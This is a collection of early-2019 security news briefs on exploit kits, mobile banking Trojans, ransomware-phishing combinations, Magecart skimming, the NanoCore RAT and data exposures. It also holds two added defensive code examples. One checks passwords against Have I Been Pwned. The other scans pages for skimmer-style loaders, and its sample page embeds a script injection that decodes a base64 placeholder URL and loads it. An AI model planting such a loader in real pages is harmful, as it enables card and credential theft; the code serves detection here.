The new year is a time for resolutions and promises of change, so much so that even malware has returned from a bit of time off with some new features, including a new Flash exploit, according to Malwarebytes head of investigations, Jérôme Segura.
The Fallout exploit kit (EK) took a little respite over the first few weeks of 2019, but it has returned, this time using CVE-2018-15982, along with HTTPS support, a new landing page format, and PowerShell to run its payloads. In addition, Segura said the team has seen an increase in RIG EK campaigns, which he suspects might have been an effort to fill that temporary void.
As the malware has returned to business, it continues to spread using malvertising chains. In September 2018, FireEye wrote that the Fallout EK was discovered affecting mostly countries in the Asia Pacific region. Though it did distribute SmokeLoader in Japan, the malware then shifted to dropping GandCrab in the Middle East.
When the malware was detected again in October 2018, the EK was being used in the HookAds campaign, which delivered victims to a fraudulent dating page, according to Malware-Traffic-Analysis.net, which also noted that the first payload was the Minotaur ransomware, followed by AZORult during the second and third runs.
Since Fallout EK's return, Malwarebytes researchers have discovered the malware is delivering the GandCrab ransomware, though it delivers its payload via PowerShell, as opposed to iexplore.exe. “This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload,” Segura wrote.
"What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques," he continued. "In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proofs of concept. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer.”
Malicious code was lurking about in two different apps within the Google Play store, according to researchers at Trend Micro who have disclosed that they discovered a banking Trojan in what seemed like legitimate apps.
Both the currency converter and the battery-saving app have been removed from Google Play, but not before they were downloaded thousands of times. The battery app, BatterySaverMobi, even had 73 reviews resulting in a 4.5 star rating, making it appear all the more legitimate.
“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER ). Upon analysis of the payload, we noted that the code is strikingly similar to known Anubis samples. And we also saw that it connects to a command and control (C&C) server with the domain aserogeege.space, which is linked to Anubis as well,” researchers wrote.
The apps were reportedly able to evade detection by using the device's motion sensor data.
The malware authors assume that a device scanning for malware is an emulator with no motion sensors, so the app monitors the user’s steps through the motion sensor and uses the presence or absence of sensor data to determine whether it is running in a sandbox environment. If it is, the malicious code does not run.
If it does run, though, the user receives a fraudulent prompt, alerting them that a system update is available.
“Here’s more proof that criminals are following users to mobile devices and investing more time and effort in attempting to exploit them. As hard as organizations might work to secure their customers’ mobile experiences, attackers work just as hard to innovate and find ways to take advantage,” said Sam Bakken, senior product marketing manager, OneSpan.
“This is why it’s imperative to give app developers a leg up with one-stop mobile app security tools that allow them to build security into mobile apps from the start, which will save them time and effort and save financial institutions and other purveyors of high-value mobile services money in terms of reduced fraud and maintaining consumer trust in their brand. In addition, meeting attackers’ innovations with mobile app security innovations such as App Shielding – which proactively detects and defends against a variety of nefarious activities executed by mobile banking Trojans such as this one – is another step in the right direction for what will be an ongoing battle.”
A new strain of yet another ransomware campaign has been discovered in which the malicious actors have expanded payment options beyond Bitcoin; they are instead offering alternatives (such as PayPal) that include a phishing link, according to MalwareHunterTeam.
Attackers are stealing a page from Daedalus and are killing two birds with one stone by including a link to make a payment. To obtain the decryption key, victims can follow the link to the PayPal phishing page, where their login credentials are stolen. The combination of two threat vectors makes this attack particularly dangerous for unsuspecting victims.
The new attack method combines “a ransom note that directs victims to a PayPal phishing page...Clicking on the Buy Now button, it directs to the credit card part of the phish already (so the login part is skipped). After filling & clicking Agree comes the personal info part & then finished,” the team tweeted. Once that payment is processed, the victim receives a confirmation.
For victims who pay with Bitcoin, the threat actors also requested that victims send an email with a reference number, which is provided in the ransom.
“Malicious actors are continually becoming more sophisticated. With this particular campaign involving phishing as an immediate follow-up threat vector to the ransomware, this attack has the potential to cause significant harm,” said DomainTools’ senior security adviser, Corin Imai.
“Not only will victims be dealing with the impact of ransomware, but many will also be directed to a carefully crafted phishing site that will attempt to steal their credentials. As seen in past attacks, ransomware campaigns have targeted individuals with the threat of releasing compromising content or rendering their computers useless, leaving victims feeling that they have no choice but to pay up. The best advice in this scenario is to be hyper-vigilant, double-check URLs, and when in doubt, don’t click.”
The third annual CyberFirst Girls competition will kick off on Monday as GCHQ looks to help address a chronic gender imbalance and skills shortage in the industry.
Over the past two years, the intelligence service’s National Cyber Security Centre (NCSC) has managed to attract 12,500 female pupils from schools across the UK to take part.
Teams of up to four plus a teacher or mentor can enter, with girls in Year 8 in England and Wales, S2 in Scotland and Year 9 in Northern Ireland (12-13-years-old) able to participate.
They’ll face a week of online challenges in four key areas — cryptography, cybersecurity, logic and coding and networking — with the top 10 teams competing face-to-face at a grand final in Edinburgh in March.
Participants are also able to apply for a place on CyberFirst Girls Defenders: free four-day residential and non-residential courses taking place in April-May and designed to teach further skills in how to build and protect small networks and personal devices.
James Hadley, CEO of Immersive Labs, welcomed the initiatives as helping to encourage a new generation of cybersecurity talent.
"In my experience, men and women have distinctly different approaches to problem-solving in cyber. Women are typically more methodical — which allows them to take a long-term and determined approach to finding a resolution and complements men's slightly faster-moving approach,” he added.
“In the long term, this initiative will also set the groundwork for building a network of like-minded people to encourage and support one another when starting out in the space.”
Attracting more gender diversity into the information security industry has been a challenge for years. Today just 24% of the global workforce are women, yet the sector as a whole suffers from shortages reaching nearly three million professionals.
Government figures published in December last year claimed that over half (57%) of all UK firms and charities have a “basic technical cybersecurity skills gap.”
It’s a situation predicted to get worse if the UK leaves the European Union as it has signaled this year.
Last month, the government released a new skills strategy in an effort to reduce skills shortfalls and promised that the new UK Cyber Security Council will receive £2.5m of public funding to help in its mission to “lay the structural foundations” of the profession.
However, it has been criticized in the past by MPs for failing to address the immediate challenges facing businesses in the critical national infrastructure sector.
Facebook has removed hundreds of fake Pages and accounts after spotting a coordinated effort by Russian state-linked actors to spread disinformation in Ukraine and other former Soviet countries.
There were two linked campaigns: the first targeting Romania, Latvia, Estonia, Lithuania, Armenia, Azerbaijan, Georgia, Tajikistan, Uzbekistan, Kazakhstan, Moldova, Russia and Kyrgyzstan.
Although purporting to be independent or general interest Pages on topics ranging from weather and travel to politics, they were actually run by employees of Kremlin news agency Sputnik, according to Facebook’s head of cybersecurity policy, Nathaniel Gleicher.
The 289 fake Pages and 75 spoof accounts posted disinformation on local corruption and protests, and anti-NATO sentiment, spending $135,000 on ads, hosting 190 events and attracting 790,000 followers.
Facebook also removed 107 Pages, Groups and accounts and 41 Instagram accounts for similar “coordinated inauthentic behavior” targeting Ukrainians. Account holders pretended to be regular Ukrainian netizens, attracting 180,000 followers and spending $25,000 on ads.
This campaign apparently shared similar characteristics to the disinformation blitz carried out by the Internet Research Agency (IRA) ahead of the US mid-terms last year and the 2016 presidential election.
“We’re taking down these Pages and accounts based on their behavior, not the content they post. In these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action,” said Gleicher.
“While we are making progress rooting out this abuse, as we’ve said before, it’s an ongoing challenge because the people responsible are determined and well-funded.”
The accounts effectively promoted Sputnik content and that of its parent company, state-run Rossiya Segodnya, whilst hiding its true source. The effect was to increase Sputnik’s reach in the countries covered by 170%, according to the Digital Forensic Research Lab.
“Most posts were apolitical, but some, especially in the Baltic States, were sharply political, anti-Western, and anti-NATO,” the body said.
Things could be about to get even worse for Huawei after a report claimed the US Department of Justice is readying an indictment against the firm for IP theft against global partner companies.
One of these is T-Mobile. That case has already been tried in a civil court in 2017, with a federal jury in Seattle siding with the US mobile carrier in finding Huawei liable for the theft of robotic technology it was developing.
The incident happened in 2014, when a Huawei engineer stole part of T-Mobile’s smartphone testing “Tappy” robot, whilst visiting its Bellevue lab as an industry partner.
Now the DoJ is reportedly flexing its muscles, with a criminal investigation into more widespread IP theft by the Shenzhen giant. An indictment could come soon, a person familiar with the matter told the WSJ.
It comes as CFO and daughter of Huawei’s founder, Meng Wanzhou, remains under house arrest in Vancouver awaiting extradition to the US.
This is said to be linked to another criminal investigation, into whether she conspired to trick US banks into unwittingly breaking sanctions on Iran by claiming Huawei subsidiary Skycom was a separate business.
All this comes as governments around the world continue to reassess whether Huawei represents a national security risk as a provider of 5G network equipment.
Although it has protested its innocence on numerous occasions, claiming it’s a victim of geopolitics, the US, New Zealand, Australia, Japan and others have banned or are restricting the firm.
In Poland, the government is mulling whether to change the law to do the same after a sales director in the country was arrested on suspicion of spying.
The German government this week became the latest to consider a ban on Huawei 5G products on national security grounds.
With 5G set to play a key role in critical infrastructure for years to come, the fear is that Huawei may be forced to do the bidding of the Chinese government in the future to provide it with a strategic advantage.
An attack leveraging the open-source Build Your Own Botnet (BYOB) framework has reportedly been intercepted by Israeli cybersecurity firm Perception Point’s incident response team. According to the team, this appears to be the first time the BYOB framework has been found to be used for fraudulent activity in the wild.
While these tactics and techniques have historically been limited in use to financially backed advanced persistent threat (APT) groups, they are now more easily accessed by novice criminals, in part because of the more widespread popularity of plug-and-play hacking kits, researchers said.
In July, a BYOB framework that implements all the building blocks needed to build a botnet was developed to improve cybersecurity defenses; however, what is used by defense can also fall into the hands of those with more malicious intentions. The continued growth of these hacking kits allows any script kiddie or malicious attacker to leverage this framework and carry out attacks that otherwise wouldn’t be possible.
According to the team’s email analysis, victims received an email with an HTML attachment containing both a link to a phishing site impersonating the Office 365 login page and script code that automatically downloaded malware to the victim’s computer. The payload then awaits commands after connecting to the attacker’s server.
“The attack we intercepted was a targeted email attack against one of our clients. It was distributed via the email channel so the extent of it is to whomever the attacker chose to send it to. The nature of the tool [BYOB] used in the attack is mass remote control; therefore, we presume that this wasn't a single email sent, and we expect that others might have been compromised by this attack as well,” said Shlomi Levin, co-founder and CTO, Perception Point.
“The attack was easily prepared using the BYOB framework; hence, it doesn't cost the attacker much investment, so I would expect to see more BYOB used in the future.”
Despite a 28% decrease in cybersecurity startups during 2017, global venture capital funding for cybersecurity rebounded with record high investments, according to Strategic Cyber Ventures.
Though last year saw $5.3 billion in cybersecurity global ventures, Strategic Cyber Ventures called this an unsustainable investment rate.
Over half of cybersecurity founders of new startups have more than a decade of executive or entrepreneurial experience, as opposed to the past two years in which there was nearly an even split between experienced founders and less-seasoned founders, the report found.
In fact, 2018 was the fifth consecutive year in which Israel enjoyed increasing round sizes at the seed stage. Additionally, the amount of funding across all stages increased, keeping the recent trend of fewer companies raising larger amounts of capital moving forward.
Though there were emerging fields among new startups in 2018, including cybersecurity solutions for cryptocurrencies and software-defined perimeter (SDP), the most overwhelmingly funded field across all stages was internet of things (IoT) security. Though most startups were within the SCADA and medical devices sub-domains, other emerging fields included threat detection, security operations, data protection and cloud security.
Nevertheless, the report said, “In cybersecurity, there are likely many zombies out there. They’ve raised big rounds, growth has slowed, perhaps due to vendor fatigue or increased competition, and now these companies can’t raise at increased valuations from prior rounds, or at all, and are being propped up by existing investors that will eventually grow weary of keeping them alive. These companies will eventually float to the surface over the next few years with less than desirable outcomes for investors and founders.”
According to Chris Ahern, principal, Strategic Cyber Ventures, "We’ve seen massive funds formed over the past few years and some of that money is making its way to cybersecurity deals. Second, we’ve seen some strong exits in the space through IPOs and M&A over the last couple of years.
“The problems aren’t going away. 2018 had several massive, high-profile breaches and we’ll continue to see this into 2018 as well as a continued discussion around privacy. The real question is whether it’s a good thing that 2018 was a record year for cybersecurity investment.”
Another California-based communications provider has announced a potential security incident, as VOIPo confessed that it left a database containing seven million call logs, six million text messages and other internal documents containing unencrypted passwords exposed without any password protection.
After security researcher Justin Paine notified the company, he wrote, “This database was promptly secured after I notified the company. I would like to thank VOIPo for their quick assistance in securing this data.”
In the security notice shared with customers, VOIPo wrote: “We were made aware of a development server that was exposed for a small window of time. When it was discovered, it was taken offline within 15 minutes of being notified by Cloudflare that they had discovered it. It primarily had some data for database load testing made up of call logs (partial numbers only), SMS messages our system flagged as SPAM and some general server log data."
VOIPo said the dev server was isolated and no other network was at risk because additional production systems are firewalled so that any connection to those systems would not have been possible. However, these statements have been called "misleading" on Twitter.
The VOIPo database reportedly had been exposed since June 2018 and contains call and message logs dating back to May 2015. The news comes only two months after a database misconfiguration at San Diego–based Voxox leaked 26 million text messages. As was the case in the Voxox breach, if text messages containing two-factor authentication (2FA) codes or password reset links were intercepted, they could have allowed the attacker to hijack a user’s account.
“It does not take much for outsiders to find unsecured databases and access sensitive information,” said Stephan Chenette, CTO and co-founder, AttackIQ. “In fact, there are now tools designed to detect misconfigurations within cloud tools like Amazon's S3. Misconfigured security controls are an all-too-common problem. Organizations are increasingly struggling with limited and under-trained IT resources that lead to using default account passwords, unpatched systems and poorly configured network devices.”
Although VOIPo claims there is no evidence to indicate a breach occurred, “the company cannot guarantee that no unauthorized users accessed the data, especially since it was left unsecured and easily available for months,” said Ruchika Mishra, director of products and solutions, Balbix.
The vast majority of senior decision makers across the globe expect data theft and cyber-disruption to increase in 2019, according to the latest report from the World Economic Forum (WEF).
The annual Global Risks Report for 2019 uses interviews with risk experts, business leaders, academics and others to better understand the challenges facing the world economy.
Rising dependency on technology ensured cyber-related risk remained front-of-mind for respondents, both in the near and long-term.
Some 82% said they expect data and monetary theft attacks to increase in 2019, while 80% said the same for cyber-related disruption to operations and infrastructure.
A slightly smaller number anticipated an increase in fake news (69%), personal identity theft (64%) and loss of privacy to companies (63%).
Over the next decade, respondents placed data fraud/theft and cyber-attacks fourth and fifth in terms of most likely risks, while cyber-attacks and “critical information infrastructure breakdown” were placed seventh and eighth in terms of biggest potential impact.
“There were further massive data breaches in 2018, new hardware weaknesses were revealed, and research pointed to the potential uses of artificial intelligence to engineer more potent cyber-attacks,” the report noted. “Last year also provided further evidence that cyber-attacks pose risks to critical infrastructure, prompting countries to strengthen their screening of cross-border partnerships on national security grounds.”
Veeam’s regional VP for UK & Ireland, Mark Adams, claimed the report highlights the continued need for investment in cyber-threat mitigation.
“Spending time and money on thorough cybersecurity and disaster recovery planning is no longer evidence of being overly paranoid,” he added. “When disaster strikes, whether from a data breach or service outage, having these kinds of measures in place to rely on is what will separate successful businesses from struggling ones.”
However, the findings show a slight change from last year’s report, which listed cyber-attacks as the third most likely global risk.
Millions of sensitive files dating back decades were exposed after the Oklahoma Securities Commission left 3TB of data on a storage server publicly accessible.
Researchers at UpGuard made the discovery on December 7 last year and it was fixed a day later by the commission, part of the state’s Department of Securities which regulates and administers the trading securities sector.
It was first registered as publicly accessible by Shodan a week earlier.
“The data was exposed via an unsecured rsync service at an IP address registered to the Oklahoma Office of Management and Enterprise Services, allowing any user from any IP address to download all the files stored on the server,” explained the security vendor.
“The website for the Securities Commission has an UpGuard Cyber Risk score of 171 out of 950, indicating severe risk of breach. Among the issues lowering the website’s score is the use of the web server IIS 6.0, which reached end of life in July 2015, meaning no updates to address any newly discovered vulnerabilities have been released in the last three and a half years.”
The data, which dated back to 1986 and included email back-ups and virtual images, covered a broad sweep of different areas.
These included personal information such as the Social Security numbers of 10,000 brokers, and highly sensitive life insurance information on terminally ill AIDS patients.
Also exposed were system credentials which could allow an attacker to hijack Department of Securities workstations, third-party security filings, and accounts with Thawte, Symantec Protection Suite, Tivoli and others.
The leaked data also included “spreadsheets documenting the timeline for investigations by the FBI and people they interviewed,” potentially putting witnesses at risk.
“We need to stop making it so easy for hackers and bad actors who are simply using tools that have been around for years,” argued Suzanne Spaulding, Nozomi Networks adviser and former DHS under secretary.
“Hackers use a tool called Shodan that allows anyone to scan the internet, looking for devices and computers, connected to the internet, but not protected.”
A leading security researcher has warned of a major trove of breached data being shared on hacking sites, containing over 772 million unique email addresses and more than 21 million unique passwords.
Troy Hunt, owner of the Have I Been Pwned (HIBP) breached credentials site, explained that he was alerted to the collection of 12,000 files hosted on the MEGA cloud service last week.
Although the 87GB dump was subsequently removed, he was also notified of it being shared on a hacking forum under the moniker “Collection #1.”
The total collection amounted to nearly 2.7 billion rows comprised of credentials stolen from thousands of sources in multiple breaches, said Hunt.
After cleaning up the data, he reduced this figure to 772.9 million emails — the largest ever to be loaded into HIBP — and 21.2 million dehashed passwords.
“Whilst there are many legitimate breaches that I recognise in that list, that's the extent of my verification efforts and it's entirely possible that some of them refer to services that haven't actually been involved in a data breach at all,” Hunt explained.
“However, what I can say is that my own personal data is in there and it's accurate; right email address and a password I used many years ago. Fortunately, only passwords that are no longer in use, but I still feel the same sense of dismay that many people reading this will when I see them pop up again. They're also ones that were stored as cryptographic hashes in the source data breaches … but have been cracked and converted back to plain text.”
Hunt encouraged users to check whether their emails and passwords are affected, by visiting HIBP. However, they’ll have to search separately for them as the site doesn’t store paired credentials together for security reasons.
The data could likely be fed into credential stuffing programs to automatically try the leaked credentials against accounts on multiple other sites.
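The HIBP check Hunt describes is done per password, never as an email-and-password pair, and the Pwned Passwords service is designed so that the full password hash never leaves the client: the client sends only the first five hex characters of the SHA-1 hash and receives every known suffix for that prefix (a k-anonymity range query). The following is an added example, not code from Hunt or from HIBP, showing how a client performs that comparison locally; the range response below is a constructed sample whose suffixes and counts are made up, except that the third suffix is the real remainder of SHA-1("password"). The live lookup function assumes the public endpoint `https://api.pwnedpasswords.com/range/<prefix>`.

```python
import hashlib
import urllib.request

# Constructed sample of what a range query for prefix "5BAA6" returns:
# one "<35-hex-char suffix>:<count>" line per known hash with that prefix.
# Suffixes and counts are invented for this example, except the suffix of
# SHA-1("password"), which is real so the lookup below can be exercised offline.
SAMPLE_RANGE_RESPONSE = """\
1D2DA4053E34E76F6576ED1DA63134B5E2A:2
1D72CD07550416C216D8AD296BF5C0AE8E0:10
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471
1E9F23B9B9A5B21CD95C2B0C7C4D8A2A5B7:1
"""


def sha1_hex_upper(password: str) -> str:
    """Upper-case hex SHA-1 of the password, the form Pwned Passwords uses."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_k_anonymity(password: str) -> tuple[str, str]:
    """Return (5-char prefix sent to the service, 35-char suffix kept local)."""
    digest = sha1_hex_upper(password)
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines into a dict keyed by upper-case suffix."""
    counts: dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, range_body: str) -> int:
    """How many times the password appears in breach data, matched locally.

    Only the prefix is needed to fetch range_body; the suffix comparison
    happens here, so the service never learns which password was checked.
    """
    _prefix, suffix = split_for_k_anonymity(password)
    return parse_range_response(range_body).get(suffix, 0)


def fetch_range(prefix: str, timeout: float = 10.0) -> str:
    """Live lookup against the Pwned Passwords range endpoint (network access needed)."""
    if len(prefix) != 5:
        raise ValueError("prefix must be exactly 5 hex characters")
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "example-k-anonymity-client"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def breach_count_live(password: str) -> int:
    """Convenience wrapper: fetch the range for the prefix, then compare locally."""
    prefix, _suffix = split_for_k_anonymity(password)
    return breach_count(password, fetch_range(prefix))


if __name__ == "__main__":
    # Offline demonstration against the constructed sample response.
    print("prefix/suffix:", split_for_k_anonymity("password"))
    print("count:", breach_count("password", SAMPLE_RANGE_RESPONSE))
```

Because the comparison is keyed on the full 35-character suffix, a password whose hash shares only the prefix with a breached one (the other three sample lines) correctly reports zero; this is why the design can be used for email-free checks without the service ever receiving the candidate password.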
Hunt recommended users get a password manager to store long-and-strong unique credentials for each site.
“A password manager is also a rare exception to the rule that adding security means making your life harder,” he said.
A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disabled. If the user then clicks on “enable content,” the NanoCore remote access Trojan (RAT) software is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (18.104.22.168), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, the decrypted .Net program runs as a daemon process, which Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would grant an attacker the ability to purchase virtual in-game currency using the victim’s payment card details and then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, these show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in BlueHost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel or change a flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelfth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
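As an added example (not RiskIQ's, the group's or the ad network's code), the following Node.js scanner looks for the loader pattern quoted above in page source: a quoted base64 literal that decodes to an http(s) URL, scored higher when the same inline snippet also decodes at runtime with atob and creates a script element. The sample HTML and the host name in it are constructed placeholders.

```javascript
// Added example, not RiskIQ's or the group's code: a defender-side scanner that
// flags inline <script> snippets which carry a base64-encoded URL, decode it at
// runtime (atob) and inject a script element, the loader pattern described above.
// The HTML and the host name below are constructed placeholders.

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// Quoted literals long enough to hold an encoded URL; padding optional
const B64_RE = /["']([A-Za-z0-9+/]{16,}={0,2})["']/g;
const URL_RE = /^https?:\/\/[\w.-]+(?::\d+)?(?:\/[^\s"'<>]*)?$/;

// Returns the decoded http(s) URL, or null if the literal is not one
function decodesToUrl(literal) {
  const decoded = Buffer.from(literal, 'base64').toString('utf8');
  return URL_RE.test(decoded) ? decoded : null;
}

// Scan every inline script; a hit needs a base64 literal that decodes to a URL,
// and scores higher when runtime decoding and dynamic script creation appear too
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const body = m[1];
    const decodesAtRuntime = /\batob\s*\(/.test(body);
    const createsScript = /createElement\s*\(\s*["']script["']\s*\)/.test(body);
    for (const b of body.matchAll(B64_RE)) {
      const decodedUrl = decodesToUrl(b[1]);
      if (decodedUrl === null) continue;
      findings.push({
        encoded: b[1], decodedUrl, decodesAtRuntime, createsScript,
        score: 1 + Number(decodesAtRuntime) + Number(createsScript), // 3 = strongest match
      });
    }
  }
  return findings;
}

// Constructed sample page: one benign analytics snippet and one loader built the
// way the text describes; the stage URL is a placeholder, encoded here so the
// sample stays consistent with the decoder above
const STAGE_URL = 'https://cdn.example.invalid/stage.js';
const ENCODED = Buffer.from(STAGE_URL).toString('base64');
const SAMPLE_HTML = [
  '<html><body>',
  '<script>window.dataLayer = window.dataLayer || []; dataLayer.push({event: "pageview"});</script>',
  `<script>var s=document.createElement("script");s.src=atob("${ENCODED}");document.head.appendChild(s);</script>`,
  '</body></html>',
].join('\n');

for (const f of scanHtml(SAMPLE_HTML)) {
  console.log(`score ${f.score}: ${f.encoded} -> ${f.decodedUrl}`);
}
```

Run it with node; a score of 3 is the strongest match. It spots only the stager snippet, not the second-stage skimmer or its self-integrity check.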
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and a $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14, 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14, 2020, Microsoft is also offering Extended Security Updates (ESUs), which will be priced per device and increase in cost every year until January 2023.
